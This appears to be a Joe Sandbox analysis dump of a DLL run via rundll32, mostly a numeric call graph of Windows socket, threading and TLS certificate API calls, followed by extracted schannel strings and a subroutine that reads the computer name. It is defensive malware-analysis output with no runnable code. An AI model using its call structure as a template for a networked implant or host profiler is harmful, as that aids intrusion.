85067 6cff417a 85065->85067 85066->85067 85073 6cff40e7 85066->85073 85068 6d0489c0 CatchGuardHandler 5 API calls 85067->85068 85069 6cff4187 85068->85069 85069->84685 85070 6cff4168 85071 6d0489c0 CatchGuardHandler 5 API calls 85070->85071 85072 6cff4176 85071->85072 85072->84685 85073->85070 85074 6cff4130 85073->85074 85075 6cff4116 85073->85075 85077 6cff4151 85074->85077 85079 6d050dae 80 API calls 85074->85079 85075->85070 85076 6cff411b 85075->85076 85078 6d0489c0 CatchGuardHandler 5 API calls 85076->85078 85080 6d0489c0 CatchGuardHandler 5 API calls 85077->85080 85081 6cff412c 85078->85081 85082 6cff414a 85079->85082 85083 6cff4164 85080->85083 85081->84685 85082->85070 85082->85077 85083->84685 85084->84588 85086 6d048d74 85087 6d048d82 85086->85087 85088 6d048d7d 85086->85088 85092 6d048c3e 85087->85092 85103 6d049b04 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 85088->85103 85093 6d048c4a __FrameHandler3::FrameUnwindToState 85092->85093 85094 6d048c73 dllmain_raw 85093->85094 85098 6d048c6e __DllMainCRTStartup@12 85093->85098 85100 6d048c59 85093->85100 85095 6d048c8d dllmain_crt_dispatch 85094->85095 85094->85100 85095->85098 85095->85100 85096 6d048cdf 85097 6d048ce8 dllmain_crt_dispatch 85096->85097 85096->85100 85099 6d048cfb dllmain_raw 85097->85099 85097->85100 85098->85096 85104 6d048b8e 103 API calls 4 library calls 85098->85104 85099->85100 85102 6d048cd4 dllmain_raw 85102->85096 85103->85087 85104->85102 85105 6d005590 85109 6d04fa98 17 API calls 85105->85109 85106 6d0055a1 85107 6d0055d7 85106->85107 85110 6d004fd0 141 API calls 85106->85110 85109->85106 85110->85107 85111 6d048a34 85112 6d048a72 85111->85112 85113 6d048a3f 85111->85113 85147 6d048b8e 103 API calls 4 library calls 85112->85147 85115 6d048a64 85113->85115 85116 6d048a44 85113->85116 85123 6d048a87 85115->85123 85117 6d048a49 85116->85117 85118 6d048a5a 85116->85118 85122 6d048a4e 85117->85122 85145 6d048e65 26 API calls 85117->85145 85146 6d048e46 28 API calls 85118->85146 85124 6d048a93 __FrameHandler3::FrameUnwindToState 85123->85124 85148 6d048ed6 85124->85148 85126 6d048b5c 85126->85122 85127 6d048a9a __DllMainCRTStartup@12 85127->85126 85128 6d048b86 85127->85128 85129 6d048ac1 85127->85129 85173 6d049b8a 4 API calls 2 library calls 85128->85173 85159 6d048e38 85129->85159 85132 6d048b8d 85137 6d048ade 85167 6d05c36e 85137->85167 85138 6d048b10 ___scrt_is_nonwritable_in_current_image 85138->85126 85141 6d048b48 ?SetDisablePrintScreen@@YAXH 85138->85141 85141->85126 85143 6d048afd 85143->85138 85172 6d05c343 ?SetDisablePrintScreen@@YAXH 85143->85172 85145->85122 85146->85122 85147->85122 85149 6d048edf 85148->85149 85174 6d04915c IsProcessorFeaturePresent 85149->85174 85151 6d048eeb 85175 6d04c87e 14 API calls 2 library calls 85151->85175 85153 6d048ef0 85154 6d048ef4 85153->85154 85176 6d05d39a ?SetDisablePrintScreen@@YAXH ?SetDisablePrintScreen@@YAXH 85153->85176 85154->85127 85156 6d048efd 85157 6d048f0b 85156->85157 85177 6d04c8b0 8 API calls 2 library calls 85156->85177 85157->85127 85178 6d048f0f 85159->85178 85161 6d048ad0 85161->85138 85162 6d049ca7 85161->85162 85163 6d049cb7 85162->85163 85164 6d048ad9 85162->85164 85163->85164 85165 6d049cbe ?SetDisablePrintScreen@@YAXH 85163->85165 85166 6d049b4f InitializeSListHead 85164->85166 85165->85163 85166->85137 85168 6d05c37a 85167->85168 85169 6d048af2 85168->85169 85170 6d05c380 ?SetDisablePrintScreen@@YAXH 85168->85170 85169->85138 85171 6d048e0d IsProcessorFeaturePresent ___scrt_release_startup_lock 85169->85171 85170->85168 85171->85143 85172->85138 85173->85132 85174->85151 85175->85153 85176->85156 85177->85154 85179 6d048f1f 85178->85179 85180 6d048f1b 85178->85180 85181 6d048f2c ___scrt_release_startup_lock 85179->85181 85184 6d049b8a 4 API calls 2 library calls 85179->85184 85180->85161 85181->85161 85183 6d048f95 85184->85183 85185 6d01cbb0 85186 6d01cc13 85185->85186 85187 6d01cc2b 85185->85187 85186->85187 85188 6d01cc18 85186->85188 85189 6d01cc32 85187->85189 85190 6d01cc47 85187->85190 85191 6d00a450 82 API calls 85188->85191 85192 6d00a450 82 API calls 85189->85192 85193 6d01cc4c 85190->85193 85195 6d01cc5f 85190->85195 85219 6d01cc23 85191->85219 85192->85219 85194 6d00a450 82 API calls 85193->85194 85194->85219 85202 6d01ccd7 85195->85202 85224 6d01cd23 _Yarn 85195->85224 85227 6d051ef0 85195->85227 85241 6d0645be 85195->85241 85196 6d01ccb3 85198 6d01ccba 85196->85198 85196->85202 85197 6d03b400 13 API calls 85199 6d01d02e 85197->85199 85275 6d00a380 82 API calls 2 library calls 85198->85275 85201 6d01d039 _Yarn 85199->85201 85205 6d00a450 82 API calls 85199->85205 85206 6d0489c0 CatchGuardHandler 5 API calls 85201->85206 85203 6d01cd28 85202->85203 85204 6d01cd18 85202->85204 85202->85224 85208 6d00a450 82 API calls 85203->85208 85207 6d00a450 82 API calls 85204->85207 85205->85201 85209 6d01d0de 85206->85209 85207->85224 85208->85224 85210 6d01cf6f 85211 6d01cf7b 85210->85211 85212 6d01cf9a 85210->85212 85214 6d00a450 82 API calls 85211->85214 85276 6d01a1f0 61 API calls 3 library calls 85212->85276 85214->85219 85215 6d01cfc1 85277 6d00a380 82 API calls 2 library calls 85215->85277 85216 6d01cfb0 85217 6d00a450 82 API calls 85216->85217 85217->85219 85219->85197 85219->85201 85220 6d00a450 82 API calls 85220->85219 85221 6d01cfd8 85221->85219 85221->85220 85222 6d00a450 82 API calls 85222->85224 85224->85210 85224->85215 85224->85219 85224->85221 85224->85222 85254 6d01f340 85224->85254 85228 6d0645be 85227->85228 85229 6d0645d6 85228->85229 85230 6d0645cb 85228->85230 85232 6d0645de 85229->85232 85239 6d0645e7 _strftime 85229->85239 85278 6d05f83c 18 API calls 3 library calls 85230->85278 85234 6d05f802 ___free_lconv_mon 17 API calls 85232->85234 85233 6d0645d3 85237 6d0645e4 85233->85237 85234->85237 85235 6d064611 RtlReAllocateHeap 85235->85237 85235->85239 85236 6d0645ec 85279 6d051f98 17 API calls __dosmaperr 85236->85279 85237->85196 85239->85235 85239->85236 85280 6d05c2c0 EnterCriticalSection LeaveCriticalSection ?SetDisablePrintScreen@@YAXH std::_Facet_Register 85239->85280 85242 6d0645d6 85241->85242 85243 6d0645cb 85241->85243 85245 6d0645de 85242->85245 85252 6d0645e7 _strftime 85242->85252 85281 6d05f83c 18 API calls 3 library calls 85243->85281 85247 6d05f802 ___free_lconv_mon 17 API calls 85245->85247 85246 6d0645d3 85250 6d0645e4 85246->85250 85247->85250 85248 6d064611 RtlReAllocateHeap 85248->85250 85248->85252 85249 6d0645ec 85282 6d051f98 17 API calls __dosmaperr 85249->85282 85250->85196 85252->85248 85252->85249 85283 6d05c2c0 EnterCriticalSection LeaveCriticalSection ?SetDisablePrintScreen@@YAXH std::_Facet_Register 85252->85283 85256 6d01f359 85254->85256 85255 6d01f367 85255->85224 85256->85255 85267 6d01f3b0 85256->85267 85332 6d00b2b0 7 API calls CatchGuardHandler 85256->85332 85259 6d01f388 85262 6d01f39d 85259->85262 85271 6d01f4ea 85259->85271 85260 6d01f486 85264 6d01f47e 85260->85264 85335 6d01fff0 87 API calls CatchGuardHandler 85260->85335 85333 6d01f540 97 API calls 2 library calls 85262->85333 85264->85224 85266 6d01f3a4 85266->85264 85266->85267 85267->85260 85267->85264 85270 6d01f502 WSAGetLastError 85267->85270 85267->85271 85284 6d00b2b0 7 API calls CatchGuardHandler 85267->85284 85285 6d01f9e0 85267->85285 85334 6d018a90 15 API calls CatchGuardHandler 85267->85334 85336 6d00a380 82 API calls 2 library calls 85270->85336 85273 6d01f4f1 85271->85273 85337 6d00a380 82 API calls 2 library calls 85271->85337 85273->85224 85274 6d01f514 85274->85224 85275->85219 85276->85216 85277->85219 85278->85233 85279->85237 85280->85239 85281->85246 85282->85250 85283->85252 85284->85267 85288 6d01fa1a 85285->85288 85286 6d0489c0 CatchGuardHandler 5 API calls 85287 6d01fd36 85286->85287 85287->85267 85289 6d01ffcb 85288->85289 85291 6d01fabb 85288->85291 85292 6d01fad3 85288->85292 85294 6d01fac6 85288->85294 85353 6d00a380 82 API calls 2 library calls 85289->85353 85338 6d00a380 82 API calls 2 library calls 85291->85338 85292->85294 85295 6d01fd11 85292->85295 85302 6d01fb1c _Yarn 85292->85302 85294->85286 85339 6d00a380 82 API calls 2 library calls 85295->85339 85297 6d01ff09 85297->85294 85348 6d01a1f0 61 API calls 3 library calls 85297->85348 85299 6d01ff27 85300 6d01ff30 85299->85300 85301 6d01ff83 85299->85301 85303 6d01ff38 85300->85303 85304 6d01ff6b 85300->85304 85352 6d00a380 82 API calls 2 library calls 85301->85352 85302->85289 85302->85294 85302->85297 85309 6d01fd52 85302->85309 85314 6d01fd0f 85302->85314 85306 6d01ff40 85303->85306 85307 6d01ff53 85303->85307 85351 6d00a380 82 API calls 2 library calls 85304->85351 85349 6d00a380 82 API calls 2 library calls 85306->85349 85350 6d00a380 82 API calls 2 library calls 85307->85350 85340 6d00a380 82 API calls 2 library calls 85309->85340 85313 6d01fee2 85313->85294 85347 6d03efd0 124 API calls 3 library calls 85313->85347 85314->85294 85314->85313 85315 6d01fe92 85314->85315 85324 6d01fdf5 __fread_nolock 85314->85324 85344 6d01a1f0 61 API calls 3 library calls 85315->85344 85318 6d01fea5 85345 6d00a380 82 API calls 2 library calls 85318->85345 85319 6d01fec3 85319->85313 85322 6d01fecb 85319->85322 85320 6d01febc CertFreeCertificateContext 85320->85319 85346 6d00a380 82 API calls 2 library calls 85322->85346 85325 6d01fe7e 85324->85325 85326 6d01fe53 85324->85326 85331 6d01fe75 85324->85331 85343 6d00a380 82 API calls 2 library calls 85325->85343 85341 6d003340 94 API calls 3 library calls 85326->85341 85329 6d01fe61 85329->85331 85342 6d00a380 82 API calls 2 library calls 85329->85342 85331->85319 85331->85320 85332->85259 85333->85266 85334->85267 85335->85264 85336->85274 85337->85264 85338->85294 85339->85294 85340->85294 85341->85329 85342->85331 85343->85331 85344->85318 85345->85331 85346->85294 85347->85294 85348->85299 85349->85294 85350->85294 85351->85294 85352->85294 85353->85294 85354 6d035bd0 recv 85355 6d035c99 85354->85355 85356 6d035c4d WSAGetLastError 85354->85356 85361 6cffeec0 2 API calls 85355->85361 85364 6d035c5d 85355->85364 85357 6d035c65 85356->85357 85356->85364 85365 6d01a850 61 API calls 3 library calls 85357->85365 85359 6d0489c0 CatchGuardHandler 5 API calls 85362 6d035ce9 85359->85362 85360 6d035c75 85366 6d00a380 82 API calls 2 library calls 85360->85366 85361->85364 85364->85359 85365->85360 85366->85364 85367 6d035850 85368 6d035899 85367->85368 85391 6d03588f 85367->85391 85369 6d0359a7 85368->85369 85368->85391 85396 6d036c70 85368->85396 85446 6d018a90 15 API calls CatchGuardHandler 85369->85446 85371 6d0489c0 CatchGuardHandler 5 API calls 85375 6d0359a0 85371->85375 85373 6d0359ba 85379 6d035a00 85373->85379 85383 6d0359d8 85373->85383 85373->85391 85376 6d03590b 85377 6d03595e 85376->85377 85378 6d03591e WSASetLastError 85376->85378 85376->85391 85377->85391 85440 6d037240 85377->85440 85445 6d01a850 61 API calls 3 library calls 85378->85445 85384 6d037350 3 API calls 85379->85384 85380 6d0358f7 WSAGetLastError 85444 6d036650 87 API calls CatchGuardHandler 85380->85444 85381 6d0358db connect 85381->85369 85381->85380 85383->85376 85447 6d037350 SleepEx getsockopt 85383->85447 85388 6d035a12 85384->85388 85386 6d035945 85389 6d00a450 82 API calls 85386->85389 85388->85376 85392 6d035a1d 85388->85392 85389->85377 85391->85371 85393 6cffeec0 2 API calls 85392->85393 85394 6d035a27 85393->85394 85450 6d037050 85394->85450 85397 6cffeec0 2 API calls 85396->85397 85398 6d036cb0 85397->85398 85477 6d0372b0 85398->85477 85400 6d036ccb 85408 6d036f81 85400->85408 85482 6d037180 85400->85482 85402 6d0489c0 CatchGuardHandler 5 API calls 85405 6d0358c4 85402->85405 85403 6d037022 closesocket 85412 6d036fa8 85403->85412 85404 6d036ce2 85406 6d00a450 82 API calls 85404->85406 85404->85408 85405->85376 85405->85380 85405->85381 85407 6d036d14 85406->85407 85409 6d036d3d setsockopt 85407->85409 85424 6d036d83 85407->85424 85408->85403 85408->85412 85410 6d036d61 WSAGetLastError 85409->85410 85409->85424 85501 6d01a850 61 API calls 3 library calls 85410->85501 85411 6d036dca 85413 6d036dee getsockopt 85411->85413 85421 6d036dd1 85411->85421 85412->85402 85416 6d036e10 85413->85416 85417 6d036e1a setsockopt 85413->85417 85415 6d03b400 13 API calls 85415->85411 85416->85417 85416->85421 85417->85421 85418 6d036d77 85420 6d00a450 82 API calls 85418->85420 85419 6d036e4d setsockopt 85423 6d036e71 85419->85423 85431 6d036e82 85419->85431 85420->85424 85421->85419 85422 6d036e7d 85421->85422 85422->85408 85425 6d036f53 85422->85425 85427 6d036fde 85422->85427 85426 6d00a450 82 API calls 85423->85426 85424->85411 85424->85415 85502 6d036760 169 API calls 2 library calls 85425->85502 85426->85422 85503 6d03efa0 ioctlsocket 85427->85503 85430 6d036fe8 85430->85412 85436 6d037050 90 API calls 85430->85436 85433 6d036eae WSAIoctl 85431->85433 85432 6d036f70 85432->85427 85435 6d036f79 85432->85435 85433->85422 85434 6d036ee3 WSAGetLastError 85433->85434 85437 6d00a450 82 API calls 85434->85437 85435->85408 85438 6d036ffd 85436->85438 85437->85422 85439 6cffeec0 2 API calls 85438->85439 85439->85412 85441 6d037298 closesocket 85440->85441 85443 6d03724e 85440->85443 85441->85391 85442 6d03725b 85442->85391 85443->85441 85443->85442 85444->85376 85445->85386 85446->85373 85448 6d037397 85447->85448 85449 6d03738f WSAGetLastError 85447->85449 85448->85376 85449->85448 85510 6d04a960 85450->85510 85453 6d0370f4 85514 6d00af50 56 API calls __dosmaperr 85453->85514 85454 6d0370ad WSAGetLastError 85512 6d01a850 61 API calls 3 library calls 85454->85512 85457 6d037110 85459 6d037167 85457->85459 85460 6d037117 85457->85460 85458 6d0370c8 85513 6d00a380 82 API calls 2 library calls 85458->85513 85464 6d0489c0 CatchGuardHandler 5 API calls 85459->85464 85515 6d051f98 17 API calls __dosmaperr 85460->85515 85463 6d0370d5 85467 6d0489c0 CatchGuardHandler 5 API calls 85463->85467 85465 6d037179 85464->85465 85465->85391 85466 6d03711d 85516 6d051f98 17 API calls __dosmaperr 85466->85516 85469 6d0370ed 85467->85469 85469->85391 85470 6d037124 85517 6d01a850 61 API calls 3 library calls 85470->85517 85472 6d037139 85518 6d00a380 82 API calls 2 library calls 85472->85518 85474 6d037147 85475 6d0489c0 CatchGuardHandler 5 API calls 85474->85475 85476 6d037160 85475->85476 85476->85391 85478 6d0372f0 socket 85477->85478 85481 6d0372c0 85477->85481 85479 6d03730c 85478->85479 85478->85481 85480 6d037312 socket 85479->85480 85479->85481 85480->85481 85481->85400 85504 6d00af50 56 API calls __dosmaperr 85482->85504 85484 6d0371c1 85485 6d037222 85484->85485 85486 6d0371c8 85484->85486 85487 6d0489c0 CatchGuardHandler 5 API calls 85485->85487 85505 6d051f98 17 API calls __dosmaperr 85486->85505 85489 6d037234 85487->85489 85489->85404 85490 6d0371ce 85506 6d051f98 17 API calls __dosmaperr 85490->85506 85492 6d0371db 85507 6d051f98 17 API calls __dosmaperr 85492->85507 85494 6d0371e2 85508 6d01a850 61 API calls 3 library calls 85494->85508 85496 6d0371f4 85509 6d00a380 82 API calls 2 library calls 85496->85509 85498 6d037202 85499 6d0489c0 CatchGuardHandler 5 API calls 85498->85499 85500 6d03721b 85499->85500 85500->85404 85501->85418 85502->85432 85503->85430 85504->85484 85505->85490 85506->85492 85507->85494 85508->85496 85509->85498 85511 6d037090 getsockname 85510->85511 85511->85453 85511->85454 85512->85458 85513->85463 85514->85457 85515->85466 85516->85470 85517->85472 85518->85474 85519 6d0510fc 85520 6d051109 85519->85520 85521 6d062d50 __Getctype 17 API calls 85520->85521 85522 6d051123 85521->85522 85523 6d05f802 ___free_lconv_mon 17 API calls 85522->85523 85524 6d05112f 85523->85524 85525 6d062d50 __Getctype 17 API calls 85524->85525 85529 6d051155 85524->85529 85526 6d051149 85525->85526 85528 6d05f802 ___free_lconv_mon 17 API calls 85526->85528 85528->85529 85530 6d051161 85529->85530 85531 6d06347d 7 API calls std::_Lockit::_Lockit 85529->85531 85531->85529 85532 6d06297d 85533 6d060774 __fread_nolock 52 API calls 85532->85533 85536 6d06298a 85533->85536 85534 6d062996 85535 6d0629e2 85535->85534 85537 6d062a44 85535->85537 85539 6d0607b0 52 API calls 85535->85539 85536->85534 85536->85535 85555 6d062b45 54 API calls __fread_nolock 85536->85555 85544 6d062a73 85537->85544 85541 6d062a37 85539->85541 85541->85537 85556 6d062bd5 17 API calls 2 library calls 85541->85556 85545 6d060774 __fread_nolock 52 API calls 85544->85545 85546 6d062a82 85545->85546 85547 6d062a95 85546->85547 85548 6d062b28 85546->85548 85550 6d062ab2 85547->85550 85553 6d062ad9 85547->85553 85549 6d05edc8 __wsopen_s 77 API calls 85548->85549 85552 6d062a55 85549->85552 85551 6d05edc8 __wsopen_s 77 API calls 85550->85551 85551->85552 85553->85552 85557 6d05c187 56 API calls _strftime 85553->85557 85555->85535 85556->85537 85557->85552 85558 6cfff080 85559 6cfff0ac 85558->85559 85562 6cfff0b2 85558->85562 85604 6d010fd0 85559->85604 85561 6cffeec0 2 API calls 85563 6cfff0eb 85561->85563 85562->85561 85569 6cfff660 85563->85569 85565 6cfff105 85566 6cfff10c 85565->85566 85609 6d00a380 82 API calls 2 library calls 85565->85609 85568 6cfff127 85571 6cfff66f __fread_nolock 85569->85571 85573 6cfff71d 85571->85573 85574 6cfff6f8 InitializeCriticalSectionEx 85571->85574 85582 6cfff781 __fread_nolock 85571->85582 85572 6cfff7a4 85572->85565 85576 6cfff738 closesocket 85573->85576 85577 6cfff742 85573->85577 85610 6d01bde0 socket 85574->85610 85576->85577 85579 6cfff748 DeleteCriticalSection 85577->85579 85580 6cfff757 85577->85580 85578 6cfff712 85578->85573 85583 6cfff7d2 85578->85583 85579->85580 85581 6cfff77e closesocket 85580->85581 85580->85582 85581->85582 85642 6d051f98 17 API calls __dosmaperr 85582->85642 85602 6cfff81a 85583->85602 85639 6d01c620 85583->85639 85585 6cfff82a EnterCriticalSection LeaveCriticalSection 85587 6cfff868 85585->85587 85588 6cfff854 85585->85588 85586 6cfff8a2 85647 6d051f98 17 API calls __dosmaperr 85586->85647 85591 6cfff86d 85587->85591 85592 6cfff876 85587->85592 85644 6d01c650 CloseHandle 85588->85644 85645 6d01c660 WaitForSingleObjectEx CloseHandle 85591->85645 85646 6cfff520 DeleteCriticalSection closesocket __fread_nolock 85592->85646 85593 6cfff860 85593->85565 85594 6cfff85b 85599 6cfff87f 85594->85599 85603 6cfff898 closesocket 85599->85603 85600 6cfff8ca 85600->85565 85601 6cfff873 85601->85592 85602->85585 85602->85586 85603->85586 85605 6d010fd9 85604->85605 85606 6d01100e socket 85604->85606 85605->85562 85607 6d011028 closesocket 85606->85607 85608 6d01101f 85606->85608 85607->85562 85608->85562 85609->85568 85611 6d01be17 htonl setsockopt 85610->85611 85612 6d01bffd 85610->85612 85613 6d01be73 bind 85611->85613 85614 6d01bfeb closesocket closesocket closesocket 85611->85614 85615 6d0489c0 CatchGuardHandler 5 API calls 85612->85615 85613->85614 85616 6d01be8a getsockname 85613->85616 85614->85612 85617 6d01c00f 85615->85617 85616->85614 85618 6d01bea4 85616->85618 85617->85578 85618->85614 85619 6d01beaf listen 85618->85619 85619->85614 85620 6d01bec1 socket 85619->85620 85620->85614 85621 6d01bed4 connect 85620->85621 85621->85614 85622 6d01beeb 85621->85622 85648 6d03efa0 ioctlsocket 85622->85648 85624 6d01bef3 85624->85614 85625 6d018710 15 API calls 85624->85625 85626 6d01bf1d accept 85625->85626 85626->85614 85627 6d01bf37 85626->85627 85628 6cffeec0 2 API calls 85627->85628 85629 6d01bf41 send 85628->85629 85635 6d01bf65 85629->85635 85630 6d018710 15 API calls 85631 6d01bf87 recv 85630->85631 85632 6d01bf9c WSAGetLastError 85631->85632 85631->85635 85634 6cffeec0 2 API calls 85632->85634 85633 6d01c01e 85633->85614 85636 6d01c041 closesocket 85633->85636 85634->85635 85635->85614 85635->85630 85635->85633 85637 6d0489c0 CatchGuardHandler 5 API calls 85636->85637 85638 6d01c059 85637->85638 85638->85578 85649 6d05bf4e 85639->85649 85642->85572 85643 6d051f98 17 API calls __dosmaperr 85643->85602 85644->85594 85645->85601 85646->85599 85647->85600 85648->85624 85650 6d05bf6f 85649->85650 85651 6d05bf5b 85649->85651 85664 6d05befe 85650->85664 85673 6d051f98 17 API calls __dosmaperr 85651->85673 85654 6d05bf60 85674 6d04fcd8 52 API calls _strftime 85654->85674 85657 6d05bf84 CreateThread 85659 6d05bfa3 GetLastError 85657->85659 85660 6d05bfaf 85657->85660 85684 6d05bdf2 85657->85684 85675 6d051f3e 17 API calls __dosmaperr 85659->85675 85676 6d05be70 85660->85676 85665 6d062d50 __Getctype 17 API calls 85664->85665 85666 6d05bf0f 85665->85666 85667 6d05f802 ___free_lconv_mon 17 API calls 85666->85667 85668 6d05bf1c 85667->85668 85669 6d05bf40 85668->85669 85670 6d05bf23 GetModuleHandleExW 85668->85670 85671 6d05be70 19 API calls 85669->85671 85670->85669 85672 6d05bf48 85671->85672 85672->85657 85672->85660 85673->85654 85675->85660 85677 6cfff804 85676->85677 85678 6d05be7c 85676->85678 85677->85593 85677->85643 85679 6d05be82 CloseHandle 85678->85679 85680 6d05be8b 85678->85680 85679->85680 85681 6d05be91 FreeLibrary 85680->85681 85682 6d05be9a 85680->85682 85681->85682 85683 6d05f802 ___free_lconv_mon 17 API calls 85682->85683 85683->85677 85685 6d05bdfe __FrameHandler3::FrameUnwindToState 85684->85685 85686 6d05be05 GetLastError ExitThread 85685->85686 85687 6d05be12 85685->85687 85700 6d060c41 GetLastError 85687->85700 85692 6d05be37 ?SetDisablePrintScreen@@YAXH 85694 6d05be4a 85692->85694 85731 6d05bfd1 85694->85731 85695 6d05be2e 85695->85692 85701 6d060c57 85700->85701 85702 6d060c5d 85700->85702 85735 6d0632e5 7 API calls std::_Lockit::_Lockit 85701->85735 85706 6d060c61 SetLastError 85702->85706 85736 6d063324 85702->85736 85710 6d060cf6 85706->85710 85711 6d05be17 85706->85711 85708 6d062d50 __Getctype 17 API calls 85709 6d060c8e 85708->85709 85712 6d060c96 85709->85712 85713 6d060ca7 85709->85713 85743 6d054d56 52 API calls __FrameHandler3::FrameUnwindToState 85710->85743 85727 6d0665f9 85711->85727 85715 6d063324 __Getctype 7 API calls 85712->85715 85716 6d063324 __Getctype 7 API calls 85713->85716 85718 6d060ca4 85715->85718 85719 6d060cb3 85716->85719 85723 6d05f802 ___free_lconv_mon 17 API calls 85718->85723 85720 6d060cb7 85719->85720 85721 6d060cce 85719->85721 85722 6d063324 __Getctype 7 API calls 85720->85722 85742 6d060a43 17 API calls __Getctype 85721->85742 85722->85718 85723->85706 85725 6d060cd9 85726 6d05f802 ___free_lconv_mon 17 API calls 85725->85726 85726->85706 85728 6d066609 __FrameHandler3::FrameUnwindToState 85727->85728 85729 6d05be22 85727->85729 85728->85729 85759 6d063157 85728->85759 85729->85692 85734 6d0635cd 6 API calls std::_Lockit::_Lockit 85729->85734 85764 6d05bea7 85731->85764 85734->85695 85735->85702 85744 6d063092 85736->85744 85739 6d06335e TlsSetValue 85740 6d063349 ?SetDisablePrintScreen@@YAXH 85741 6d060c79 85740->85741 85741->85706 85741->85708 85742->85725 85745 6d0630c2 85744->85745 85749 6d0630be 85744->85749 85745->85749 85751 6d062fc7 85745->85751 85748 6d0630dc GetProcAddress 85748->85749 85750 6d0630ec std::_Lockit::_Lockit 85748->85750 85749->85739 85749->85740 85750->85749 85752 6d062fd8 ___vcrt_FlsSetValue 85751->85752 85753 6d06306e 85752->85753 85754 6d062ff6 LoadLibraryExW 85752->85754 85758 6d063044 LoadLibraryExW 85752->85758 85753->85748 85753->85749 85755 6d063075 85754->85755 85756 6d063011 GetLastError 85754->85756 85755->85753 85757 6d063087 FreeLibrary 85755->85757 85756->85752 85757->85753 85758->85752 85758->85755 85760 6d063092 std::_Lockit::_Lockit 5 API calls 85759->85760 85761 6d063173 85760->85761 85762 6d06317c ?SetDisablePrintScreen@@YAXH 85761->85762 85763 6d06318b 85761->85763 85762->85763 85763->85729 85773 6d060d92 GetLastError 85764->85773 85766 6d05bef4 ExitThread 85767 6d05beb2 85767->85766 85768 6d05becb 85767->85768 85796 6d063608 6 API calls std::_Lockit::_Lockit 85767->85796 85770 6d05bede 85768->85770 85771 6d05bed7 CloseHandle 85768->85771 85770->85766 85772 6d05beea FreeLibraryAndExitThread 85770->85772 85771->85770 85772->85766 85774 6d060dae 85773->85774 85775 6d060da8 85773->85775 85777 6d063324 __Getctype 7 API calls 85774->85777 85779 6d060db2 SetLastError 85774->85779 85797 6d0632e5 7 API calls std::_Lockit::_Lockit 85775->85797 85778 6d060dca 85777->85778 85778->85779 85781 6d062d50 __Getctype 15 API calls 85778->85781 85779->85767 85782 6d060ddf 85781->85782 85783 6d060de7 85782->85783 85784 6d060df8 85782->85784 85785 6d063324 __Getctype 7 API calls 85783->85785 85786 6d063324 __Getctype 7 API calls 85784->85786 85787 6d060df5 85785->85787 85788 6d060e04 85786->85788 85792 6d05f802 ___free_lconv_mon 15 API calls 85787->85792 85789 6d060e1f 85788->85789 85790 6d060e08 85788->85790 85798 6d060a43 17 API calls __Getctype 85789->85798 85791 6d063324 __Getctype 7 API calls 85790->85791 85791->85787 85792->85779 85794 6d060e2a 85795 6d05f802 ___free_lconv_mon 15 API calls 85794->85795 85795->85779 85796->85768 85797->85774 85798->85794 85799 6cfff580 85800 6d018e80 55 API calls 85799->85800 85801 6cfff5ad 85800->85801 85817 6d01c090 getaddrinfo 85801->85817 85804 6cfff5ec EnterCriticalSection 85807 6cfff5fa LeaveCriticalSection 85804->85807 85808 6cfff614 85804->85808 85805 6cfff5d1 WSAGetLastError 85806 6cfff5d7 WSAGetLastError 85805->85806 85811 6cfff5e0 85805->85811 85806->85804 85806->85811 85823 6cfff520 DeleteCriticalSection closesocket __fread_nolock 85807->85823 85809 6cfff61c send 85808->85809 85810 6cfff63a LeaveCriticalSection 85808->85810 85809->85810 85813 6cfff635 WSAGetLastError 85809->85813 85814 6cfff608 85810->85814 85811->85804 85813->85810 85815 6d0489c0 CatchGuardHandler 5 API calls 85814->85815 85816 6cfff65a 85815->85816 85821 6cfff5c2 85817->85821 85822 6d01c0c3 _Yarn 85817->85822 85818 6d01c20a WSASetLastError 85818->85821 85819 6d01c1c5 freeaddrinfo 85820 6d01c1cc 85819->85820 85820->85818 85820->85821 85821->85804 85821->85805 85822->85818 85822->85819 85822->85820 85823->85814
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: $ $$$(memory blob)$@$AES$All available TLS 1.3 ciphers were disabled.$Cipher name too long, not checked.$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$Passed in an unknown TLS 1.3 cipher.$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Unable to set ciphers to from connection ssl config$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                    • API String ID: 0-3615662502
                    • Opcode ID: 0a0e79c83f06d40216cb747e2cc512a93fcf8d155bc71a029e3911328c75426e
                    • Instruction ID: af3b947062bc393b188d84d19cc717c9d779df723d35b70960414a944b478f62
                    • Opcode Fuzzy Hash: 0a0e79c83f06d40216cb747e2cc512a93fcf8d155bc71a029e3911328c75426e
                    • Instruction Fuzzy Hash: 3482A27190C3429BF711CFA48C44BAF7BE9AF86348F44492DF9859B282E775D508CB92

                    Control-flow Graph

                    APIs
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
                      • Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
                      • Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
